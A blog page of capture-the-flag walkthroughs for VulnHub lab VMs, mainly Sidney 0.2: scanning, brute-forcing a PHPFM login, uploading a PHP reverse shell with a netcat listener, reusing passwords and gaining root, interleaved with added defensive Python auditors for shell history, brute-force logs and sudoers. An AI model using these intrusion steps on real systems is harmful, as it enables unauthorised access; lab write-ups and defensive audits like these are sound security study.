<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">top</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ps aux</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">id</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">whoami</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ls -lah</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">pwd</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ps aux</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">sshpass -p thisimypassword ssh JKanode@localhost</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">22</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">apt-get install sshpass</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">23</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">sshpass -p JZQuyIN5 peter@localhost</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">24</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ps -ef</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">25</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">top</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">26</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">kill -9 3747</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">27</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">28</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">29</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">30</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">31</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">32</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">whoami</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">33</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">34</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">35</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">36</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">37</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">38</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">cat: peter/.bash_history: Permission denied</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">39</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">40</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">41</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">42</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">43</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">44</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">45</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">id</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">46</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">top</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">47</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
</tbody></table>
Nice... 2 more sets of credentials<br />
<br />JKanode:thisismypassword<br />
peter:JZQuyIN5<br />
<br />
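The leak above has two ingredients: home directories readable by everyone, and passwords typed on the command line (sshpass -p), which bash keeps in .bash_history. As an added example that is not from the write-up, here is a Python audit that reports both conditions across a tree of home directories without copying any secret into its report; the directory layout, user names and fake passwords are constructed in a temporary directory.<br />

```python
"""Audit home directories for exposed shell history and secrets typed on the CLI.

Added example, not from the write-up. Reports (a) homes and history files that
'other' can read and (b) history lines that carry a password argument. The
report names the file, line and command only; the secret itself is never echoed.
"""
import os
import re
import stat
import tempfile

HISTORY_FILES = (".bash_history", ".zsh_history", ".python_history", ".mysql_history")

# Command shapes that place a secret on the command line, so it lands in history.
# sshpass -p is the one found above; the others are common equivalents.
SECRET_PATTERNS = [
    re.compile(r"\bsshpass\s+-p\s*\S+"),
    re.compile(r"--password[= ]\S+"),
    re.compile(r"\bmysql\b.*\s-p\S+"),
    re.compile(r"\bcurl\b.*\s-u\s+\S+:\S+"),
]


def others_can_read(path):
    """True if 'other' may read the file, or read and traverse the directory."""
    mode = os.lstat(path).st_mode
    if stat.S_ISDIR(mode):
        return bool(mode & stat.S_IROTH and mode & stat.S_IXOTH)
    return bool(mode & stat.S_IROTH)


def audit_homes(home_root):
    """Walk every home under home_root and return a list of finding dicts."""
    findings = []
    for user in sorted(os.listdir(home_root)):
        home = os.path.join(home_root, user)
        if not os.path.isdir(home):
            continue
        home_open = others_can_read(home)
        if home_open:
            findings.append({"user": user, "kind": "world_readable_home", "path": home})
        for name in HISTORY_FILES:
            hist = os.path.join(home, name)
            if not os.path.isfile(hist):
                continue
            # Exposure needs both: a traversable home and a readable history file.
            if home_open and others_can_read(hist):
                findings.append({"user": user, "kind": "world_readable_history", "path": hist})
            try:
                with open(hist, errors="replace") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if any(p.search(line) for p in SECRET_PATTERNS):
                            findings.append({"user": user, "kind": "secret_in_history",
                                             "path": hist, "line": lineno,
                                             "command": line.split()[0]})
            except OSError:
                pass  # unreadable as the auditing user (cf. 'Permission denied' above)
    return findings


def build_fixture():
    """Constructed /home-like tree: two open homes, one locked down. Passwords are fake."""
    root = tempfile.mkdtemp(prefix="home_audit_")
    layout = {
        "JKanode": (0o755, ["ps aux", "sshpass -p Fake-Pass-1 ssh JKanode@localhost", "exit"]),
        "zoe": (0o755, ["ls -lah", "exit"]),
        "peter": (0o700, ["sshpass -p Fake-Pass-2 ssh peter@localhost", "exit"]),
    }
    for user, (mode, history) in layout.items():
        home = os.path.join(root, user)
        os.mkdir(home)
        hist = os.path.join(home, ".bash_history")
        with open(hist, "w") as fh:
            fh.write("\n".join(history) + "\n")
        os.chmod(hist, 0o644 if mode == 0o755 else 0o600)
        os.chmod(home, mode)
    return root


if __name__ == "__main__":
    for finding in audit_homes(build_fixture()):
        print(finding)
```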
I am going to try peter's credentials first because he has a stronger password... I would like to believe he is a sudoer at a minimum.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVBRyFGewv3_RBm8HcjyMO5GmFtzo9xlERq6GWRb1UhyphenhyphenBfL6coy3Yt3z9zFqV9-RKxamn4NlUngFn1aQJLRprzlXgolt5aL6sNI8oyudyzX16xx21lsXjh9iAZv-F6vSHqAsV65eKFE60/s1600/New+Bitmap+Image+%25282%2529.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVBRyFGewv3_RBm8HcjyMO5GmFtzo9xlERq6GWRb1UhyphenhyphenBfL6coy3Yt3z9zFqV9-RKxamn4NlUngFn1aQJLRprzlXgolt5aL6sNI8oyudyzX16xx21lsXjh9iAZv-F6vSHqAsV65eKFE60/s640/New+Bitmap+Image+%25282%2529.bmp" width="592" /></a></div>
<br />
Jackpot... peter has full root access. With a sudo su we get root and claim our flag.<br />
<br />
I would like to thank G0tMi1k and Vulnhub and all the testers. This was a very fun VM.<br />
ByteReaper - http://www.blogger.com/profile/05483546627343627430<br />
<br />
Sidney 0.2 (2016-06-06)<br />
Hello World.<br />
Today I am going to be offering up a guide to completing the <a href="https://www.vulnhub.com/entry/sidney-02,149/">Sidney 0.2</a> VM hosted on <a href="https://vulnhub.com/" target="_blank">VulnHub</a>. The VM was produced by <a href="https://twitter.com/@knightmare2600" target="_blank">@knightmare2600</a><br />
<br />
<h3>
Description: </h3>
Welcome to my third boot2root / CTF this one is called Sidney. The VM
is set to grab a DHCP lease on boot. As before, gaining root is not the
end of this VM. You will need to snag the flag, and being me, it's
never where they normally live... B-)<br />
If you are having trouble with the NIC, make sure the adapter is set to use the MAC 00:0C:29:50:14:56<br />
Some hints for you:<br />
<ul>
<li>If you are hitting a wall, read https://de.wikipedia.org/wiki/MOS_Technology_6502</li>
<li>The flag is audio as well as visual</li>
</ul>
SHA1SUM: 114ABA151B77A028AA5CFDAE66D3AEC6EAF0751A sidney.ova<br />
Many thanks to Rasta_Mouse and GKNSB for testing this CTF.<br />
Special thanks and shout-outs go to GKNSB and Rasta_Mouse, hopefully
he streams this one live too! Also a shout-out to g0tmi1k for #vulnhub
and offering to host my third CTF.<br />
<br />
Here We Go:<br />
1. Host Discovery<br />
2. Service Enumeration<br />
<br />
<br />
Host Discovery:<br />
<br />
Discovery of the IP: netdiscover -r 192.168.234.0/24
<br />
<script src="https://gist.github.com/ByteReaper/64def2267ff2e32bd4b4dd1daef6f643.js"></script>
<br />
<b>Our target is 192.168.234.167</b><br />
<br />
<b>Service Enumeration:</b><br />
Now that we have our target (192.168.234.167) we can use nmap to discover any running services.<br />
<i><b>NOTE: nmap could also have been used to discover the host, but I like using netdiscover purely to speed up the process.</b></i><br />
<br />
<br />
<script src="https://gist.github.com/ByteReaper/9f607a858547735c5165a825ef26158b.js"></script>
Hmm, only 80 open. Looks like we will be looking for LFI/RFI or a file upload to drop a malicious PHP script containing either command injection or a reverse shell.
<br />
Nikto to the rescue:
<br />
Using nikto.... nikto -host 192.168.234.167
<br />
<script src="https://gist.github.com/ByteReaper/a91035146ef4ad40b880872820a9dc35.js"></script>
Relatively standard information. We note Apache 2.4.18 and we move on.<br />
dirb/dirbuster to the rescue.
<br />
Personally I always run dirb with the defaults. When needed I will run dirbuster with /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt
<br />
After running dirb -host 192.168.234.167
<br />
<script src="https://gist.github.com/ByteReaper/eb0b5a3faf73353111fe74dc8e6f1bff.js"></script>
Yikes... not much going on here. Time to pull up the site and see what we are working with. I am still going to hold off on dirbuster for now (I love trying to look at the HTML/CSS and figure out other directories/pages first).
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZBiiHj-mB7lP0t92Ba9gFSPL12YCf5Y64Zzoa3hZuicY7W80h5xLtWajOvOrVifFIZtJ5coioDhOw_HiD5yKjA5RZUF4_-_g7nfYWi9PGuVY7YynRMtPC4trSNyHe0RA2KczHwvHJb90/s1600/Sidney_Homescreen.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZBiiHj-mB7lP0t92Ba9gFSPL12YCf5Y64Zzoa3hZuicY7W80h5xLtWajOvOrVifFIZtJ5coioDhOw_HiD5yKjA5RZUF4_-_g7nfYWi9PGuVY7YynRMtPC4trSNyHe0RA2KczHwvHJb90/s400/Sidney_Homescreen.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
"Give Ben Daglish a call. I'm sure he's know the login B-)" I will add Ben Daglish to my notes as I smell some OSINT (<a href="https://en.wikipedia.org/wiki/Open-source_intelligence" target="_blank">Open-source Intelligence</a>) coming up.<br />
Viewing the source we are presented with the following:<br />
<br />
<script src="https://gist.github.com/ByteReaper/4689ddc35010aa3767dcf4b0ac93134e.js"></script>
Sweet, the location of the image is in a folder named commodore64. Wonder if that folder has directory listing enabled...
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUIMYmjw5AB17LW3camImjOZ5asar811JP1ZaU7Wx-d91UK7UoECdeR8kKDZQLRQXXTSd1PFwXiVOJYi1Udojl1G0pB1pqhc9BQGeJkd3OYUpZs6MN3WYU0cT2l_2kn-X7DZvOjjLoiSo/s1600/Sidney_Commodore64_Directory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUIMYmjw5AB17LW3camImjOZ5asar811JP1ZaU7Wx-d91UK7UoECdeR8kKDZQLRQXXTSd1PFwXiVOJYi1Udojl1G0pB1pqhc9BQGeJkd3OYUpZs6MN3WYU0cT2l_2kn-X7DZvOjjLoiSo/s1600/Sidney_Commodore64_Directory.png" /></a></div>
<br />
Nope... no directory browsing, but we are greeted by a Commodore 64 gif and a message... the source tells us...
<br />
<br />
<script src="https://gist.github.com/ByteReaper/4d0e3cb1d97169fb59124f5c703152e7.js"></script>
<br />
We have a second name: "robhubbard" and a clue as to the password:<br />
"password is the C=64 sound chip lowercase...3letters4digits no space..." <br />
<br />
Geez.... might as well just write the password.... or so I thought... So I went off and used Wikipedia (based on the search results for "c=64 sound chip")... long story short I found chips with the prefix of sid and mod...<br />
<br />
Which is great and all... but where the hell is a login screen? Before I use dirbuster on the commodore64 folder I decide to try and figure out what I'm dealing with... attempting index.php displays...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJQhz6Gaa_RDK2kbadQ7gnlPIYQVAvyfdwQWLKxn_GriNnvCUZzVrGx-5wWFzvjqlg55uVc2nH6DGlKxp4FD0crRpUyrV2iGIY6ViJ_ufL5YKqoS_zQqAPBpVl6kqPOlP5OlfzxVBytpc/s1600/Sidney_Commodore64_index_PHP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="199" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJQhz6Gaa_RDK2kbadQ7gnlPIYQVAvyfdwQWLKxn_GriNnvCUZzVrGx-5wWFzvjqlg55uVc2nH6DGlKxp4FD0crRpUyrV2iGIY6ViJ_ufL5YKqoS_zQqAPBpVl6kqPOlP5OlfzxVBytpc/s400/Sidney_Commodore64_index_PHP.png" width="400" /></a></div>
<br />
<br />
A login screen...wtf were we looking at before...using just index without a suffix returns us to the commodore64 gif...hmm...<br />
Anyhow, PHPFM... the hell is that... after a quick search we can see that PHPFM is a PHP-based file manager (uploading a PHP revshell is looking pretty promising).<br />
<br />
Using sqlmap -u "http://192.168.234.167/commodore64/index.php" --forms yielded no results. Damn...<br />
OK, so what we know already from discovery is that Ben Daglish knows the login, and there is an assumed user "robhubbard" who seems very willing to give up a password.<br />
Time to make a brute forcer using Python:<br />
<br />
<script src="https://gist.github.com/ByteReaper/40fc715f20b3c090316f8d693084019c.js"></script>
<i><b>NOTE: You can also use a proxy like Burp Suite (specifically Intruder) to attack the form. But I am a coder at heart... and it always seems much more gratifying to create a tool to accomplish a task.</b></i>
<br />
<br />
Running python Bruter.py:<br />
<br />
<script src="https://gist.github.com/ByteReaper/00e74e0dd8b252f8f4d679fa2e2e2f53.js"></script><br />
<b><i>NOTE: Using the bruteforcer too much caused the Sidney VM (at least on my machine) to have some funky errors. (The session was not stored properly upon logging on and I had to reset the VM to get it to function correctly again.)</i></b>
<br />
<br />
Judging by the output, the length of the page increased from 1840/1841 to 18438, so I think we got a hit on:<br />
<br />
username: robhubbard<br />
password: mos6518<br />
<br />
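The same length jump (1840/1841 for a failed login, 18438 when it works) is visible to the server operator in the access log. Added example, not the author's Bruter.py: a Python check over Apache combined-format lines that groups POSTs per client and path, takes the dominant response size as the failure page and flags a run of those followed by an outlier; the log lines, client addresses and user agent are constructed.<br />

```python
"""Spot form brute-forcing in a web access log by response-size pattern.

Added example, not from the write-up. A guessing run against a login form is a
long series of POSTs from one client to one path whose responses are all the
same size (the 'login failed' page); the first response of a different size
after that run is the likely successful guess. No site-specific size is
hard-coded: the dominant size within each run is taken as the failure page.
"""
import re
from collections import Counter, defaultdict

# Apache/nginx combined log format, up to the response size field.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
MIN_ATTEMPTS = 8     # shortest run of same-sized POST responses worth flagging
SIZE_TOLERANCE = 2   # bytes; tokens or timestamps jitter the failure page slightly


def post_sizes(lines):
    """Yield (client, path, response_size) for every POST with a known size."""
    for line in lines:
        m = CLF_RE.match(line)
        if m and m["method"] == "POST" and m["size"] != "-":
            yield m["ip"], m["path"], int(m["size"])


def detect(lines):
    """Return one alert per (client, path) whose POSTs look like a guessing run."""
    runs = defaultdict(list)
    for ip, path, size in post_sizes(lines):
        runs[(ip, path)].append(size)
    alerts = []
    for (ip, path), sizes in runs.items():
        if len(sizes) < MIN_ATTEMPTS:
            continue
        baseline = Counter(sizes).most_common(1)[0][0]   # the 'login failed' size
        failures, success_at = 0, None
        for attempt, size in enumerate(sizes, 1):
            if abs(size - baseline) <= SIZE_TOLERANCE:
                failures += 1
            elif success_at is None and failures >= MIN_ATTEMPTS:
                success_at = attempt                     # first outlier after the run
        if failures >= MIN_ATTEMPTS:
            alerts.append({"ip": ip, "path": path, "attempts": len(sizes),
                           "baseline_size": baseline,
                           "likely_success": success_at is not None,
                           "success_attempt": success_at})
    return alerts


# Constructed sample log: nine failed guesses, one success, then unrelated traffic
# and a single normal login from another client (which must not be flagged).
ATTACKER = "192.168.234.1"  # constructed client address
LOGIN = "/commodore64/index.php"


def _post(ip, second, size):
    return (f'{ip} - - [06/Jun/2016:16:24:{second:02d} -0400] "POST {LOGIN} HTTP/1.1" '
            f'200 {size} "http://192.168.234.167{LOGIN}" "Mozilla/5.0"')


SAMPLE_LOG = (
    [_post(ATTACKER, i, 1840 + i % 2) for i in range(9)]
    + [_post(ATTACKER, 9, 18438)]
    + ['192.168.234.50 - - [06/Jun/2016:16:25:01 -0400] "GET /commodore64/ HTTP/1.1" '
       '200 2350 "-" "Mozilla/5.0"',
       _post("192.168.234.50", 30, 18438)]
)

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```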
Trying robhubbard/mos6518 we are authenticated into the PHPFM site.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNXmWD5sxJuBrDlK05pc9L3M6rWCsE9Iy_uu1sSIBkNgkIjiVFpmt0SbF3gyCig3DRg0a34wJgbG27EQ8r2OfbjqbBbxPg0IzkyJ4exCkxjTOR4w04xXLcPxOi7ln2tJVWozMd6Q6JLa8/s1600/Sidney_PHPFM_HomeScreen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNXmWD5sxJuBrDlK05pc9L3M6rWCsE9Iy_uu1sSIBkNgkIjiVFpmt0SbF3gyCig3DRg0a34wJgbG27EQ8r2OfbjqbBbxPg0IzkyJ4exCkxjTOR4w04xXLcPxOi7ln2tJVWozMd6Q6JLa8/s640/Sidney_PHPFM_HomeScreen.png" width="640" /></a></div>
ooooo...."Upload Files" looks pretty sweet.<br />
Time to use a PHP reverse shell that I found on <a href="https://gist.github.com/silv3rm00n/5371322" target="_blank">pentestmonkey.net</a><br />
<br />
The reverse shell uploaded without an issue... I figured the site would have fought me a little more but, hey, that's probably why I've never heard of PHPFM lol..<br />
Anyhow, firing up a netcat listener on port 666 (nc -lvp 666) and visiting the revshell.php that I uploaded, I get a reverse shell. w00t!
<br />
<br />
<script src="https://gist.github.com/ByteReaper/e6d5aa4cf300ebd31981f457913b95c1.js"></script><br />
<b><i>NOTE: I have slightly modified the payload that gets executed so that it displays id/whoami/cat /etc/passwd upon connection.</i></b>
<br />
<br />
The output from the cat /etc/passwd shows us that the 2 users of the system are root and rhubbard.... Wait.... as in robhubbard? Wonder if the doofus is using the same password. Before we can attempt a su (attempting a su robhubbard at this stage gives us a "su: must be run from a terminal" error), we must get a different shell, which is easy enough. We will use a jailbreak trick found on g0tmi1k's <a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" target="_blank">blog</a>: python -c "import pty;pty.spawn('/bin/bash');"<br />
<br />
Using python -c "import pty;pty.spawn('/bin/bash');" results in a "/bin/sh: 2: python: not found" error... python is missing... hrmmm...<br />
I decide to go looking to see what's up with python.
<br />
<script src="https://gist.github.com/ByteReaper/c1290bf0977122f76819d5595077afca.js"></script>
Hmmm. Can I replace python with python3.5? Sure can.<br />
<script src="https://gist.github.com/ByteReaper/4e72aa24d362e345550702252b3b3df0.js"></script><br />
<br />
Ok... now let's see if numbnuts uses the same password. Using "su rhubbard" and "mos6518" as the password, we successfully switch users to rhubbard...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIexJWkAswhfxkxvipdTan1eQwz27-xgUKXJiDi4g5QMrFtDgSdHep8ZcpqFBtx6E9ely1JkRQDqgtwqFdWr9RY_ZUM42HB78y8sC_ulE832_sI797F_W9xC5dU7GuoJx3y3sZU6mVKv8/s1600/facepalm.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIexJWkAswhfxkxvipdTan1eQwz27-xgUKXJiDi4g5QMrFtDgSdHep8ZcpqFBtx6E9ely1JkRQDqgtwqFdWr9RY_ZUM42HB78y8sC_ulE832_sI797F_W9xC5dU7GuoJx3y3sZU6mVKv8/s400/facepalm.jpg" /></a></div>
<br />
<br />
Can we get lucky with sudo? sudo -l results in the following:<br />
<br />
<script src="https://gist.github.com/ByteReaper/ad45f0328d18aa98e7fd455b715270c5.js"></script>
<br />
rhubbard has the permissions to run any and everything as root. Let's get our root permissions using sudo su<br />
<script src="https://gist.github.com/ByteReaper/6371b206e2a3a3ded0e1ed90710b0f0b.js"></script>
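The sudo -l result above is the kind of entry a sudoers audit should catch. The following is an added example, not code from the original post: it parses sudoers-style user specifications and flags any non-root principal allowed to run ALL as root, noting NOPASSWD. The sample sudoers text is constructed (the VM's real file is not shown on the page).

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sudoers sample (assumed, not the VM's actual file):
# the rhubbard entry mirrors what sudo -l revealed in the writeup.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root     ALL=(ALL:ALL) ALL
rhubbard ALL=(ALL) ALL
ops      ALL=(ALL) NOPASSWD: ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
%admin   ALL=(ALL) ALL
deploy   ALL=(www-data) /usr/bin/systemctl restart nginx
"""

# who  hosts = (runas_user[:runas_group])  [TAG:] cmd, [TAG:] cmd ...
USER_SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAGS = re.compile(r"^(?:[A-Z]+:\s*)+")  # strips NOPASSWD:, NOEXEC:, SETENV: ...


@dataclass
class Finding:
    who: str        # user or %group
    runas: str      # effective run-as user ("ALL" or "root" here)
    nopasswd: bool  # True when the ALL entry needs no password
    reason: str


def audit_sudoers(text: str) -> List[Finding]:
    """Flag entries letting a non-root principal run any command as root."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = USER_SPEC.match(line)
        if not m or m.group("who") == "root":    # root is expected to have ALL
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        for cmd in m.group("cmds").split(","):   # each command carries its own tags
            cmd = cmd.strip()
            if TAGS.sub("", cmd) == "ALL" and runas in ("ALL", "root"):
                nopw = cmd.startswith("NOPASSWD:")
                reason = "may run any command as root" + (" without a password" if nopw else "")
                findings.append(Finding(m.group("who"), runas, nopw, reason))
    return findings
```

On a live host the same function can be fed the output of `cat /etc/sudoers /etc/sudoers.d/*` (run as root), since the user-spec syntax is identical.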
<br />
Let's get our flag.<br />
<script src="https://gist.github.com/ByteReaper/d94e80490d84827b84509ae3b5551391.js"></script>
I forgot <a href="https://twitter.com/@knightmare2600" target="_blank">@knightmare2600</a> said we need to work to get the flag...<br />
As you can see we are presented with a hint.gif and a hidden folder called .commodore64. I will skip the hint for now and traverse the .commodore64 path.<br />
<script src="https://gist.github.com/ByteReaper/0adef943968e10ba0bc9916dd7edc0f5.js"></script><br />
<br />
Using cp I was able to copy flag.zip to /var/www/html and get the zip file onto my local machine.<br />
Of course it is password protected, so using fcrackzip we get the following output:<br />
<br />
<script src="https://gist.github.com/ByteReaper/42fad98b872addb15a583e51b3b5f7aa.js"></script><br />
<br />
Sweet so we have a flag.d64 now which can be run with an emulator.<br />
<br />
NOTE: I am lazy ATM so I will not attempt to get the emulator working, but running strings on the file tells me everything I need to know.<br />
<br />
<script src="https://gist.github.com/ByteReaper/27a6852668dcbc8cb9fd295b917565fc.js"></script><br />
<br />
<br />
Awesome VM from <a href="https://twitter.com/@knightmare2600" target="_blank">@knightmare2600</a> and a special thanks to <a href="https://vulnhub.com/" target="_blank">VulnHub</a> for hosting it.<br />
<br />
Hello W0rld? (ByteReaper, 2016-06-06)<br />
This is my obligatory hello world post.<br />
<br />
<script src="https://gist.github.com/ByteReaper/2ae735d3f079b020f44de827442509eb.js"></script>So, who am I? I'm someone with security in mind...or at least lack of security. I love doing hacking challenges hosted by <a href="https://www.vulnhub.com/" target="_blank">Vulnhub</a>.<br />
<br />
